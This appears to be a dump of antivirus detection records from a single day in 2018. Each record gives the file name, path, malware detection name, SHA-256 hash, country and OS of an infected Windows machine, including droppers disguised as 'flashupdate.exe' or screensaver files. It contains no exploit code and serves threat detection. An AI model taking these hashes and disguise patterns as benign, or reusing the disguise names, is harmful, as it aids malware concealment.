  Row(detection=Row(filename='avscan-20181102-151621-b6bc64da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae15aaa\\AVSCAN-20181102-151239-915D24CF\\AVSCAN-20181102-151621-B6BC64DA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dxab6bf.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaB6BE.tmp\\dxaB6BF.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:37:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151610-b4ec7c9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae15aaa\\AVSCAN-20181102-151239-915D24CF\\AVSCAN-20181102-151610-B4EC7C9E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210121-37d89a6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a62562e\\AVSCAN-20181102-205937-2A75F477\\AVSCAN-20181102-210121-37D89A6A', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210125-3857b43e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a62562e\\AVSCAN-20181102-205937-2A75F477\\AVSCAN-20181102-210125-3857B43E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='991851e71c62c5e345e376a662477bb3075cf309', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\991851e71c62c5e345e376a662477bb3075cf309', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200942-5929f19d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c8e45bbb\\AVSCAN-20181102-200749-4AEBDEA9\\AVSCAN-20181102-200942-5929F19D', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:10:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202959-3944d575', filepath='E:\\Documents and Settings\\X\\Dati applicazioni\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-202530-DCB9A3FA\\AVSCAN-20181102-202959-3944D575', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:31:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191452-2f32c9b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79e0e1d8\\AVSCAN-20181102-191417-289EF3A6\\AVSCAN-20181102-191452-2F32C9B6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[2].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\J5RS8X0B\\Fusion[2].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline='aeinv.dll,UpdateSoftwareInventory', country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=51200, timestamp='2018-11-02T19:08:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155229-36515af9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155229-36515AF9', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163120-be37f72f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a1b0a3\\AVSCAN-20181102-163042-B92CD8C8\\AVSCAN-20181102-163120-BE37F72F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163102-bbdcec3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a1b0a3\\AVSCAN-20181102-163042-B92CD8C8\\AVSCAN-20181102-163102-BBDCEC3A', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='obrazetc-uchetnaya-politika-na-2015-god-rb.exe', filepath='C:\\Documents and Settings\\X\\Мои документы\\Загрузки\\obrazetc-uchetnaya-politika-na-2015-god-rb.exe', filesize=2528000, name='HEUR/AGEN.1006515.#M1.#R1'), hash='0c1d41d006d24eedea4d3a0819b3d69bbcb42c603142bc355fb6d9e1302807a4', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c27f564eeff14974d20271de7eec57048d7609d0b9ca07a295b49f1b034f945', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-18\\0C27F564EEFF14974D20271DE7EEC57048D7609D0B9CA07A295B49F1B034F945', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='0c27f564eeff14974d20271de7eec57048d7609d0b9ca07a295b49f1b034f945', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:58:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bridgeunattend.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-networkbridge_31bf3856ad364e35_6.1.7600.16385_none_07c046fe67692e98\\bridgeunattend.exe', filesize=448000, name='W32/Virut.Gen.#M1.#R1'), hash='0c43551d72cdb2aa8869a64b1bf730debf55b7886990da8c03eca651bab50562', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='0c78da3d90f2b7b5976846aaa31136a601a9f378a646284a2db245abce5e346f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe803_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe803 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='0c8150de81280b03e9780366d20f7c47b2616a55c63ea136a207bd61df7d57ae', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T10:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T11:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084154-561401da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084142-5462E357\\AVSCAN-20181102-084154-561401DA', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084626-7f356f9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084616-7D9E47AA\\AVSCAN-20181102-084626-7F356F9A', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:46:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084451-70e2b916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084440-6F264A1E\\AVSCAN-20181102-084451-70E2B916', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_278\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084742-8aad5ce2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084731-89063051\\AVSCAN-20181102-084742-8AAD5CE2', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_276\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:41:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081109-3f984ed7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-081056-3D920FC8\\AVSCAN-20181102-081109-3F984ED7', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_276\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:41:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_273\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ce513747beec6a221dddede19b418cb105502523b3b2dc34eada58e1b56c4e6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\0CE513747BEEC6A221DDDEDE19B418CB105502523B3B2DC34EADA58E1B56C4E6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0ce513747beec6a221dddede19b418cb105502523b3b2dc34eada58e1b56c4e6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='-Embedding 535EA46E8CD974E91585B26A595EA663 M Global\\\\\\\\MSI0000', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\msiexec.exe', parentsize=73216, timestamp='2018-11-02T06:07:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:59:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:59:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134402-94b25cc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134402-94B25CC3', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134353-9330510d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134353-9330510D', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134304-8b50e21b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134304-8B50E21B', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134357-93e4b75b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134357-93E4B75B', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134351-92dc46e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134351-92DC46E8', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134338-90bfc6dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134338-90BFC6DD', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134355-93892457', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134355-93892457', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134404-950d0c11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134404-950D0C11', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134348-92703678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134348-92703678', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134359-9441d777', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134359-9441D777', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='frames.scr', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Photo Frames\\Frames.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='decorating - de.scr', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Interior Decorating - DE\\Decorating - DE.scr', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='temprec.exe', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempRec.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:53Z'), dt=datetime.date(2018, 11, 2)),
